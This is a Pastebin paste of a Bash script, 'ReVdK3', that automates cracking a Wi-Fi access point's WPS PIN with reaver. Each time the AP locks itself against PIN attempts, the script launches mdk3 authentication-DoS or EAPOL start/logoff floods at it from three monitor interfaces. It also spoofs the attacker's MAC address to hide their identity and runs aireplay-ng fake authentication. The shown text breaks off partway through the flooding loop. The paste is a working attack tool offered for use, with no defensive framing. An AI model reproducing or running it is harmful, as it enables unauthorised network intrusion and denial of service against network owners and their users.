API tools faq
paste
demonneni

[WPS/Reaver] mdk3 flood attack (script sh)

demonneni
Nov 20th, 2014
278
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 25.98 KB | None | 0 0
raw download clone embed print report
  1. #!/bin/bash
  2. declare MAC;
  3. declare PIN_TIME;
  4. declare WLAN;
  5. declare MON1;
  6. declare MON2;
  7. declare MON3;
  8. declare PHY_OF_WLAN_1;
  9. declare NO_OF_MONITOR_INTERFACES_CHECK;
  10. declare MONITOR_INTERFACES;
  11. declare STOP_INTERFACE;
  12. declare VARIABLE;
  13. declare CHANNEL;
  14. declare DISTANCE_BETWEEN_PINS;
  15. declare TIMEOUT;
  16. declare ESSID;
  17. declare SATISFIED_OPTION=r;
  18. declare REAVER_COMMAND_LINE;
  19. declare MDK3_MAIN_MENU_OPTION;
  20. declare RETURN_OPTION_FOR_AUTH_DOS_FOR_AUTH_DOS;
  21. declare RETURN_OPTION_FOR_EAPOL_START_FLOOD;
  22. declare EAPOL_START_FLOOD_COMMAND;
  23. declare AUTH_DOS_FLOOD_COMMAND;
  24. declare RETURN_OPTION_FOR_EAPOL_LOG_OFF_FLOOD;
  25. declare EAPOL_LOG_OFF_FLOOD_COMMAND;
  26. declare VARIABLE_CHECK_FOR_RATE_LIMITING;
  27. declare TARGET_STATION;
  28. declare MDK3_KILLALL_1
  29. declare AIREPLAY_KILLALL;
  30. declare SUCCESSIVE_EAPOL_FAILURES;
  31. declare AIREPLAY_RESET;
  32. declare MONITOR_INTERFACES_CHECK;
  33.  
  34. #WELCOM MESSAGE
  35. echo -e "\e[36m\e[1m###########################\e[0m";
  36. echo -e "\e[36m\e[1m# WELCOME TO ReVdK3 Script#  \e[35m\e[1mC\e[92m\e[1mR\e[91m\e[1mE\e[34m\e[1mA\e[33m\e[1mT\e[96m\e[1mE\e[35m\e[1mD  \e[92m\e[1mB\e[35m\e[1mY\e[0m : \e[35m\e[1mR\e[92m\e[1mE\e[91m\e[1mP\e[34m\e[1mZ\e[33m\e[1mE\e[96m\e[1mR\e[35m\e[1mO\e[92m\e[1mW\e[91m\e[1mO\e[34m\e[1mR\e[33m\e[1mL\e[96m\e[1mD\e[35m\e[1m\e[0m";
  37. echo -e "\e[36m\e[1m###########################\e[0m";
  38. echo -e "\e[36m\e[1m#####################################################################\e[0m";
  39. echo -e "\e[36m\e[1m# This Script allows you to use reaver and an mdk3 flood attack that#\e[0m";
  40. echo -e "\e[36m\e[1m# you choose                                                        #\e[0m";
  41. echo -e "\e[36m\e[1m#####################################################################\e[0m";
  42. echo -e "\e[36m\e[1m# This Script was created for Access Points that locks up for long  #\e[0m";
  43. echo -e "\e[36m\e[1m# periods of time. It works by starting reaver and continously      #\e[0m";
  44. echo -e "\e[36m\e[1m# detect when reaver is rate limiting pins, once reaver detects     #\e[0m";
  45. echo -e "\e[36m\e[1m# the AP is rate limiting pins, it starts mdk3 attacks. mdk3 attacks#\e[0m";
  46. echo -e "\e[36m\e[1m# are killed once reaver detects that the AP has unlocked itself !  #\e[0m";
  47. echo -e "\e[36m\e[1m# The prcoess goes on...                                            #\e[0m";
  48. echo -e "\e[36m\e[1m#####################################################################\e[0m";
  49. echo ;
  50. echo  -e "\e[37m\e[44m\e[1m ReVdK3.sh-r1 (Revision 1)- see README\e[0m";
  51. echo ;
  52. echo -e "\e[37m\e[44m\e[1mThanks to N1ksan for some useful ideas in this revision!\e[0m";
  53. echo ;
  54. echo -e "\e[36m\e[40m\e[1m******************************************************\e[0m";
  55. echo -e "\e[36m\e[40m\e[1m* Welcome: I need to verify your wireless interface  *\e[0m";
  56. echo -e "\e[36m\e[40m\e[1m******************************************************\e[0m";
  57. echo ;
  58. read -p "Which wireless interface you will be using? e.g wlan1, wlan2 etc": WLAN;
  59. EXISTENCE_OF_WLAN=`airmon-ng|grep ''"$WLAN"|cut -f1`;
  60. while [   -z "$WLAN" -o "$EXISTENCE_OF_WLAN" != "$WLAN" ]; do
  61. echo -e "\e[31m\e[1mYou input a wireless interface that doesn't exist!\e[0m";
  62. echo ;
  63. read -p "Which wireless interface you will be using? e.g wlan1, wlan2 etc": WLAN;
  64. EXISTENCE_OF_WLAN=`airmon-ng|grep ''"$WLAN"|cut -f1`;
  65. done
  66. PHY_OF_WLAN_1=`airmon-ng|grep $WLAN|cut -d ' ' -f4`;
  67. NO_OF_MONITOR_INTERFACES_CHECK=`airmon-ng|grep -F "$PHY_OF_WLAN_1"|wc -l`;
  68. MONITOR_INTERFACES=`airmon-ng|grep -F "$PHY_OF_WLAN_1"|cut -f1|tr -s [:space:] ' '`;
  69. echo -e "\e[36m\e[1mKilling any existing monitor interface(s) on $WLAN\e[0m";
  70. if [ "$NO_OF_MONITOR_INTERFACES_CHECK" != 1 ]; then
  71. for STOP_INTERFACE in $MONITOR_INTERFACES; do
  72. if [ "$STOP_INTERFACE" != "$WLAN"  ]; then
  73. airmon-ng stop $STOP_INTERFACE > /dev/null;
  74. fi  
  75. done
  76. fi
  77. echo -e "\e[36m\e[1mSuccessful!\e[0m";
  78. echo -e "\e[36m\e[1mStarting three new monitor modes...\e[0m";
  79. MON1=`airmon-ng start $WLAN|grep -F '(monitor mode enabled on '|tr -s [:space:] ' '|cut -d ' ' -f6|tr -d ')'`
  80. MON2=`airmon-ng start $WLAN|grep -F '(monitor mode enabled on '|tr -s [:space:] ' '|cut -d ' ' -f6|tr -d ')'`
  81. MON3=`airmon-ng start $WLAN|grep -F '(monitor mode enabled on '|tr -s [:space:] ' '|cut -d ' ' -f6|tr -d ')'`
  82. echo "Successful!"
  83. trap 'echo -e "\n\e[36m\e[1mCleaning up all temporary files created by this script..good house keeping...ensuring all processes are killed!\e[31m\e[0m"; killall mdk3 2> /dev/null; killall reaver 2> /dev/null; killall tail 2> /dev/null; rm -f /etc/reaver_tmp.txt 2> /dev/null; airmon-ng stop "$MON1" > /dev/null; airmon-ng stop "$MON2" > /dev/null; airmon-ng stop "$MON3" > /dev/null; killall aireplay-ng 2> /dev/null; rm -f /etc/aireplay_tmp.txt 2> /dev/null; killall -9 ReVdK3-r1.sh > /dev/null; '  SIGINT SIGHUP
  84. clear
  85. while [ "$SATISFIED_OPTION" = r  ]; do
  86. clear
  87. echo ;
  88. echo -e "\e[36m\e[40m\e[1m***********************************\e[0m";
  89. echo -e "\e[36m\e[40m\e[1m*Welcome to Reaver's configuration*\e[0m";
  90. echo -e "\e[36m\e[40m\e[1m***********************************\e[0m";
  91. echo ;
  92. echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
  93. echo -e "\e[36m\e[40m\e[1mx        MAC ADDRESS OF AP              x\e[0m";
  94. echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
  95. echo ;
  96. read -p "What is the mac address of the access point you are targeting?": MAC;
  97. while [ -z "$MAC" ]; do
  98. echo -e "\e[31m\e[1mYou need to input the target's MAC address\e[0m";
  99. echo ;
  100. read -p "What is the mac address of the access point you are targeting?": MAC;
  101. done
  102. echo "MAC address saved...";
  103. echo ;
  104. echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
  105. echo -e "\e[36m\e[40m\e[1mx        ESSID OF AP                    x\e[0m";
  106. echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
  107. echo ;
  108. read -p "What is the essid of the access point you are targeting": ESSID;
  109. while [ -z "$ESSID" ]; do
  110. echo -e "\e[31m\e[1mYou need to input the target's ESSID when running aireplay-ng &/or running mdk3 eapol start flood attacks!\e[0m";
  111. echo ;
  112. read -p "What is the essid of the access point you are targeting": ESSID;
  113. done
  114. echo "ESSID saved...";
  115. echo -e "\e[36m\e[1mI am hiding your identity by changing your mac\e[0m";
  116. sleep 2;
  117. ifconfig $WLAN down;
  118. ifconfig $WLAN down;
  119. ifconfig $WLAN down;
  120. ifconfig $MON1 down;
  121. ifconfig $MON1 down;
  122. ifconfig $MON2 down;
  123. ifconfig $MON2 down;
  124. ifconfig $MON3 down;
  125. ifconfig $MON3 down;
  126. macchanger -m '78:03:40:02:94:8f' "$WLAN"> /dev/null;
  127. macchanger -m '78:03:40:02:94:8f' "$MON1"> /dev/null;
  128. macchanger -m '78:03:40:02:94:8f' "$MON2"> /dev/null;
  129. macchanger -m '78:03:40:02:94:8f' "$MON3"> /dev/null;
  130. ifconfig $MON1 up;
  131. ifconfig $MON1 up;
  132. ifconfig $MON2 up;
  133. ifconfig $MON2 up;
  134. ifconfig $MON3 up;
  135. ifconfig $MON3 up;
  136. echo;
  137. echo ;
  138. echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
  139. echo -e "\e[36m\e[40m\e[1mx                              Reaver's Options                              x\e[0m";
  140. echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
  141. echo -e "\e[36m\e[40m\e[1mx                                                                            x\e[0m";
  142. echo -e "\e[36m\e[40m\e[1mx[1] Channel Option (-c)                                                     x\e[0m";
  143. echo -e "\e[36m\e[40m\e[1mx(note: Some Access Point hop to another channel when they reboot!           x\e[0m";
  144. echo -e "\e[36m\e[40m\e[1mx............................................................................x\e[0m";
  145. echo -e "\e[36m\e[40m\e[1mx[2] Timeout Option (-t)                                                     x\e[0m";
  146. echo -e "\e[36m\e[40m\e[1mx(Reaver's to wait for a message from the AP)                                x\e[0m";
  147. echo -e "\e[36m\e[40m\e[1mx............................................................................x\e[0m";
  148. echo -e "\e[36m\e[40m\e[1mx[3] Reaver's time between pin (-d)                                          x\e[0m";
  149. echo -e "\e[36m\e[40m\e[1mx                                                                            x\e[0m";
  150. echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
  151. echo ;
  152. #CHANNEL CHAIN
  153. echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
  154. echo -e "\e[36m\e[40m\e[1mx        CHANNEL SWITCH                 x\e[0m";
  155. echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
  156. echo ;
  157. read -p "What channel you want reaver listen on (-c flag), or press ENTER to use default reaver's option": CHANNEL;
  158. while [[ "$CHANNEL" != @(1|2|3|4|5|6|7|8|9|10|11|12|13|14|15|16|)  ]]; do
  159. echo -e "\e[31m\e[1mYou need to input a channel number between 1-16\e[0m";
  160. echo ;
  161. read -p "What channel you want reaver listen on (-c flag), or press ENTER to use default reaver's option": CHANNEL;
  162. done
  163. #DISTANCE BETWEEN PIN ATTEMPTS CHAIN
  164. echo ;
  165. echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
  166. echo -e "\e[36m\e[40m\e[1mx        PIN DELAY SWITCH               x\e[0m";
  167. echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
  168. echo ;
  169. read -p  "How much time in seconds for distance between pin attempts? (-d flag), if you want to use default option press ENTER ": DISTANCE_BETWEEN_PINS
  170. while [[  $DISTANCE_BETWEEN_PINS = ["-"A-Za-qs-z'`''~''@''#''$''%''^''&''*''('')''_''+''=''|''['']''{''}''\'"'"'"'';'':'',''.''<''>''/''?'' *''0']*  ]]; do
  171. echo -e "\e[31m\e[1mYou need to choose a postive number!\e[0m";
  172. echo ;
  173. read -p  "How much time in seconds for distance between pin attempts? (-d flag), if you want to use default option press ENTER ": DISTANCE_BETWEEN_PINS
  174. done
  175. #TIME OUT CHAIN
  176. echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
  177. echo -e "\e[36m\e[40m\e[1mx        TIMEOUT SWITCH                 x\e[0m";
  178. echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
  179. echo ;
  180. read -p "How much time in seconds for reaver to timeout if the AP doesn't respond? (-t flag), if you want to use default option press ENTER": TIMEOUT;
  181. while [[  $TIMEOUT = ["-"A-Za-qs-z'`''~''@''#''$''%''^''&''*''('')''_''+''=''|''['']''{''}''\'"'"'"'';'':'',''.''<''>''/''?'' *''0']*  ]]; do
  182. echo -e "\e[31m\e[1mYou need to choose a postive number!\e[0m";
  183. echo ;
  184. read -p "How much time in seconds for reaver to timeout if the AP doesn't respond? (-t flag), if you want to use default
  185. option press ENTER": TIMEOUT;
  186. echo ;
  187. done
  188. echo ;
  189. echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
  190. echo -e "\e[36m\e[40m\e[1mx    REAVER COMMAND LINE YOU HAVE CHOOSEN     x\e[0m";
  191. echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
  192. echo ;
  193.  
  194. if [ -z "$CHANNEL" -a -n "$DISTANCE_BETWEEN_PINS" -a "$TIMEOUT" ]; then
  195. echo "reaver -i $MON1 -b $MAC -S -d $DISTANCE_BETWEEN_PINS -t $TIMEOUT -l 10 -N -vv";
  196. REAVER_COMMAND_LINE=`echo "reaver -i $MON1 -b $MAC -S -d $DISTANCE_BETWEEN_PINS -t $TIMEOUT -l 10 -N -vv"`;
  197. echo ;
  198. fi
  199. if [ -z "$DISTANCE_BETWEEN_PINS" -a -n "$CHANNEL" -a -n "$TIMEOUT" ]; then
  200. echo "reaver -i $MON1 -b $MAC -S -c $CHANNEL -t $TIMEOUT -l 10 -N -vv";
  201. REAVER_COMMAND_LINE=`echo "reaver -i $MON1 -b $MAC -S -c $CHANNEL -t $TIMEOUT -l 10 -N -vv"`;
  202. echo;
  203. fi
  204. if [ -z "$TIMEOUT" -a -n "$DISTANCE_BETWEEN_PINS" -a -n "$CHANNEL" ]; then
  205. echo "reaver -i $MON1 -b $MAC -S -c $CHANNEL -d $DISTANCE_BETWEEN_PINS -l 10 -N -vv";
  206. REAVER_COMMAND_LINE=`echo "reaver -i $MON1 -b $MAC -S -c $CHANNEL -d $DISTANCE_BETWEEN_PINS -l 10 -N -vv"`;
  207. echo ;
  208. fi
  209. if [ -z "$CHANNEL" -a -z "$DISTANCE_BETWEEN_PINS" -a -n "$TIMEOUT" ]; then
  210. echo "reaver -i $MON1 -b $MAC -S -t $TIMEOUT -l 10 -N -vv";
  211. REAVER_COMMAND_LINE=`echo "reaver -i $MON1 -b $MAC -S -t "$TIMEOUT" -l 10 -N -vv"`;
  212. echo ;
  213. fi
  214. if [ -z "$CHANNEL" -a -z "$TIMEOUT" -a -n "$DISTANCE_BETWEEN_PINS" ]; then
  215. echo "reaver -i $MON1 -b $MAC -S -d $DISTANCE_BETWEEN_PINS -l 10  -N -vv";
  216. REAVER_COMMAND_LINE=`echo "reaver -i $MON1 -b $MAC -S -d $DISTANCE_BETWEEN_PINS -l 10 -N -vv"`;
  217. echo ;
  218. fi
  219. if [ -z "$DISTANCE_BETWEEN_PINS" -a -z "$TIMEOUT" -a -n "$CHANNEL" ]; then
  220. echo "reaver -i $MON1 -b $MAC -S -c $CHANNEL -l 10 -N -vv";
  221. REAVER_COMMAND_LINE=`echo "reaver -i $MON1 -b $MAC -S -c $CHANNEL -l 10 -N -vv"`;
  222. echo ;
  223. fi
  224. if [ -z "$DISTANCE_BETWEEN_PINS" -a -z "$TIMEOUT" -a -z "$CHANNEL" ]; then
  225. echo "reaver -i $MON1 -b $MAC -S -l 10 -N -vv";
  226. REAVER_COMMAND_LINE=`echo "reaver -i $MON1 -b $MAC -S -l 10 -N -vv"`;
  227. fi
  228. if [ -n "$DISTANCE_BETWEEN_PINS" -a -n "$TIMEOUT" -a -n "$CHANNEL" ]; then
  229. echo "reaver -i $MON1 -b $MAC -S -c $CHANNEL -d $DISTANCE_BETWEEN_PINS -t $TIMEOUT -l 10 -N -vv";
  230. REAVER_COMMAND_LINE=`echo "reaver -i $MON1 -b $MAC -S -c $CHANNEL -d $DISTANCE_BETWEEN_PINS -t $TIMEOUT -l 10 -N -vv"`;
  231. echo ;
  232. fi
  233. echo ;
  234. read -p "Are you satisified with this configuration? if not,  input 'r' and you will be returned to Reaver's Configuration Wizard": SATISFIED_OPTION;
  235. done
  236. if [ -e /etc/reaver_tmp.txt ]; then
  237. rm -f /etc/reaver_tmp.txt
  238. fi
  239. if [ -e /etc/aireplay_tmp.txt ]; then
  240. rm -f /etc/aireplay_tmp.txt
  241. fi
  242. clear
  243. function MDK3_MAIN_MENU {
  244. echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
  245. echo -e "\e[36m\e[40m\e[1mx                  WELCOME TO MDK3 FLOOD ATTACK MAIN MENU                    x\e[0m";
  246. echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
  247. echo -e "\e[36m\e[40m\e[1mx[1] Authentication DoS Flood Attack                                         x\e[0m";
  248. echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
  249. echo -e "\e[36m\e[40m\e[1mx[2] EAPOL Start Flood Attack                                                x\e[0m";
  250. echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
  251. echo -e "\e[36m\e[40m\e[1mx[3] EAPOL log off Flood Attack                                              x\e[0m";
  252. echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
  253. echo -e "\e[36m\e[40m\e[1mx NOTE:This script will stop reaver once it detects the AP is locked and     x\e[0m";
  254. echo -e "\e[36m\e[40m\e[1mx then flood the Access Point for the time period you choose after flooding  x\e[0m";
  255. echo -e "\e[36m\e[40m\e[1mx reaver resumes.This process goes on until reaver finds the correct pin!    x\e[0m";
  256. echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
  257. echo ;
  258. read -p "Which Attack You Prefer to carry out(Input No.)?": MDK3_MAIN_MENU_OPTION;
  259. while [[ "$MDK3_MAIN_MENU_OPTION" != @(1|2|3) ]]; do
  260. echo -e "\e[31m\e[1mIncorrect Option choosen, Please choose an option from the Main Menu!\e[0m";
  261. echo ;
  262. read -p "Which Attack You Prefer to carry out(Input No.)?": MDK3_MAIN_MENU_OPTION;
  263. done;
  264. if [  "$MDK3_MAIN_MENU_OPTION" = 1  ]; then
  265. clear
  266. AUTH_DOS_MAIN_MENU;
  267. fi
  268. if [  "$MDK3_MAIN_MENU_OPTION" = 2  ]; then
  269. clear
  270. EAPOL_START_FLOOD_ATTACK_MAIN_MENU;
  271. fi
  272. if [  "$MDK3_MAIN_MENU_OPTION" = 3  ]; then
  273. clear
  274. EAPOL_LOG_OFF_ATTACK_MAIN_MENU;
  275. fi
  276. }
  277. ###########################################################################
  278. function AUTH_DOS_MAIN_MENU {
  279. echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
  280. echo -e "\e[36m\e[40m\e[1mx                  Authentication DoS Flood Attack                           x\e[0m";
  281. echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
  282. echo -e "\e[36m\e[40m\e[1mxNOTE:This Attack will start flooding the AP with numerous fake clients      x\e[0m";
  283. echo -e "\e[36m\e[40m\e[1mxuntil reaver detects that the AP is unlocked. The attack will restart when  x\e[0m";
  284. echo -e "\e[36m\e[40m\e[1mxthe AP has locked itself again...the process goes on!                       x\e[0m";
  285. echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
  286. echo ;
  287. echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
  288. echo -e "\e[36m\e[40m\e[1mxThe Authentication DoS Flood Command line below will be used     x\e[0m";
  289. echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
  290. echo ;
  291. AUTH_DOS_FLOOD_COMMAND=`echo -e "\e[36m\e[1mmdk3 $MON1 a -a $MAC -s 200 & mdk3 $MON2 a -a $MAC -s 200 & mdk3 "$MON3" a -a $MAC -s 200\e[0m"`;
  292. echo "$AUTH_DOS_FLOOD_COMMAND";
  293. echo ;
  294. read -p "To start the attack press ENTER  to proceed or input 'r' to return to mdk3 main menu": RETURN_OPTION_FOR_AUTH_DOS_FOR_AUTH_DOS
  295. if [  "$RETURN_OPTION_FOR_AUTH_DOS_FOR_AUTH_DOS" = r ]; then
  296. clear
  297. MDK3_MAIN_MENU
  298. fi
  299. echo -e "\e[36m\e[1mStarting MDK3 Auth Flood Attack...\e[0m"
  300. sleep 3;
  301. clear
  302. REAVER & AIREPLAY & MDK3 & TAIL;
  303. }
  304. ###########################################################################
  305. function EAPOL_START_FLOOD_ATTACK_MAIN_MENU {
  306. echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
  307. echo -e "\e[36m\e[40m\e[1mx                  EAPOL Start Flood Attack                                  x\e[0m";
  308. echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
  309. echo -e "\e[36m\e[40m\e[1mxNOTE:This Attack will start flooding the AP with numerous EAPOL start       x\e[0m";
  310. echo -e "\e[36m\e[40m\e[1mxpackets until reaver detects that the AP is unlocked. The attack will       x\e[0m";
  311. echo -e "\e[36m\e[40m\e[1mxrestart when the AP has locked itself again...the process goes on!          x\e[0m";
  312. echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
  313. echo;
  314. echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
  315. echo -e "\e[36m\e[40m\e[1mxThe Authentication EAPOL Start Flood Attack Command line below will be usedx\e[0m";
  316. echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
  317. echo ;
  318. EAPOL_START_FLOOD_COMMAND=`echo -e "\e[36m\e[1mmdk3 $MON1 x 0 -t $MAC -n $ESSID -s 200 & mdk3 $MON2 x 0 -t $MAC -n $ESSID -s 200 & mdk3 $MON3 x 0 -t $MAC -n $ESSID -s 200\e[0m"`;
  319. echo "$EAPOL_START_FLOOD_COMMAND";
  320. read -p "To start the attack press ENTER  to proceed or input 'r' to return to mdk3 main menu": RETURN_OPTION_FOR_EAPOL_START_FLOOD;
  321. if [  "$RETURN_OPTION_FOR_EAPOL_START_FLOOD" = r ]; then
  322. clear
  323. MDK3_MAIN_MENU;
  324. fi
  325. echo -e "\e[36m\e[1mStarting MDK3 EAPOL Start Flood Attack...\e[0m";
  326. sleep 3;
  327. clear
  328. REAVER & AIREPLAY & MDK3 & TAIL;
  329. }
  330. ###########################################################################
  331. function EAPOL_LOG_OFF_ATTACK_MAIN_MENU {
  332. echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
  333. echo -e "\e[36m\e[40m\e[1mx                  EAPOL Log Off Flood Attack                                x\e[0m";
  334. echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
  335. echo -e "\e[36m\e[40m\e[1mxNOTE:This Attack will start flooding the AP with numerous EAPOL log off     x\e[0m";
  336. echo -e "\e[36m\e[40m\e[1mxpackets until reaver detects that the AP is unlocked. The attack will       x\e[0m";
  337. echo -e "\e[36m\e[40m\e[1mxrestart when the AP has locked itself again...the process goes on!          x\e[0m";
  338. echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
  339. echo;
  340. read -p "What is the MAC address of one of the client's connected?": TARGET_STATION
  341. while [[ "$TARGET_STATION" = @(|) ]]; do
  342. echo -e "\e[31m\e[1mYou cannot leave this field blank\e[0m";
  343. echo
  344. read -p "What is the MAC address of one of the client connected?": TARGET_STATION
  345. done
  346. echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
  347. echo -e "\e[36m\e[40m\e[1mxThe Authentication EAPOL Log Off Flood Attack Command line below will be usedx\e[0m";
  348. echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
  349. echo ;
  350. EAPOL_LOG_OFF_FLOOD_COMMAND=`echo -e "\e[36m\e[1mmdk3 $MON1 x 1 -t $MAC  -s 200 -c $TARGET_STATION & mdk3 $MON2 x 1 -t $MAC -s 200 -c $TARGET_STATION & mdk3 $MON3 x 1 -t $MAC -s 200 -c $TARGET_STATION\e[0m"`;
  351. echo "$EAPOL_LOG_OFF_FLOOD_COMMAND";
  352. read -p "To start the attack press ENTER  to proceed or input 'r' to return to mdk3 main menu": RETURN_OPTION_FOR_EAPOL_LOG_OFF_FLOOD;
  353. if [  "$RETURN_OPTION_FOR_EAPOL_LOG_OFF_FLOOD" = r ]; then
  354. clear
  355. MDK3_MAIN_MENU;
  356. fi
  357. echo -e "\e[36m\e[1mStarting MDK3 EAPOL Log Off Flood Attack...\e[0m";
  358. sleep 3;
  359. clear;
  360. REAVER & AIREPLAY & MDK3 & TAIL;
  361. }
  362. ##########################################################################
  363. function REAVER {  
  364. echo y|$REAVER_COMMAND_LINE|tee -a /etc/reaver_tmp.txt > /dev/null & aireplay-ng $MON1 -1 100000000 -a "$MAC" -e "$ESSID" -Q -q3 2> /dev/null| tee /etc/aireplay_tmp.txt > /dev/null;
  365. }
  366. ###########################################################################
  367. function MDK3 {
  368. while :; do
  369. MDK3_KILLALL_1=`ps -A|grep mdk3`
  370. VARIABLE_CHECK_FOR_RATE_LIMITING=`tail -1 /etc/reaver_tmp.txt 2> /dev/null`;
  371. SUCCESSIVE_EAPOL_FAILURES=`tail -4 /etc/reaver_tmp.txt 2> /dev/null|grep -F '[!] WARNING: 25 successive start failures'`;
  372. while [ "$VARIABLE_CHECK_FOR_RATE_LIMITING" = "[!] WARNING: Detected AP rate limiting, waiting 10 seconds before re-checking" -a -z "$MDK3_KILLALL_1"  ]; do
  373. if [ "$MDK3_MAIN_MENU_OPTION" = 1 ]; then
  374. gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -e  "mdk3 $MON1 a -a $MAC -s 200" & gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -e  "mdk3 $MON2 a -a $MAC -s 200" & gnome-terminal -e --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -e "mdk3 $MON3 a -a $MAC -s 200";
  375. sleep 0.5;
  376. fi
  377. if [ "$MDK3_MAIN_MENU_OPTION" = 2 ]; then
